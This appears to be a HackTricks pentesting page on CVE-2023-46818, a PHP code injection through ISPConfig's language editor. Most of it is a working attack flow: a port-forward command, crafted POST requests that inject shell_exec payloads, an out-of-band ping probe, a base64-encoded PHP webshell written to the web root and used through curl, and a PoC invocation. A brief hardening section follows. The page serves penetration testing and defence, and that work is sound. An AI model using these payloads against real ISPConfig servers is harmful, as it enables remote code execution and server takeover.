ISPConfig
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Overview
ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.
Key default paths:
- Web root often at
/var/www/ispconfig
when served withphp -S
or via Apache/nginx. - Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).
Tip: If the panel is bound locally (e.g. 127.0.0.1:8080
), forward it:
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
Language editor PHP code injection (CVE-2023-46818)
- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
- Preconditions:
- Login as the built-in superadmin account
admin
(other roles are not affected according to the vendor) - Language editor must be enabled:
admin_allow_langedit=yes
in/usr/local/ispconfig/security/security_settings.ini
- Login as the built-in superadmin account
- Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context
References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.
Manual exploitation flow
- Open/create a language file to obtain CSRF tokens
Send a first POST to initialize the form and parse the CSRF fields from the HTML response (csrf_id
, csrf_key
). Example request path: /admin/language_edit.php
.
- Inject PHP via records[] and save
Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...
lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
Out-of-band test (observe ICMP):
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
- Write files and drop a webshell
Use file_put_contents
to create a file under a web-reachable path (e.g., admin/
):
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
Then write a simple webshell using base64 to avoid bad characters in the POST body:
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
Use it:
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
If PHP is executed as root (e.g., via php -S 127.0.0.1:8080
started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.
Python PoC
A ready-to-use exploit automates token handling and payload delivery:
Example run:
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
Hardening
- Upgrade to 3.2.11p1 or later
- Disable the language editor unless strictly needed:
admin_allow_langedit=no
- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
- Enforce strong authentication for the built-in
admin
account
References
- ISPConfig 3.2.11p1 Released (fixes language editor code injection)
- CVE-2023-46818 – NVD
- bipbopbup/CVE-2023-46818-python-exploit
- HTB Nocturnal: Root via ISPConfig language editor RCE
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.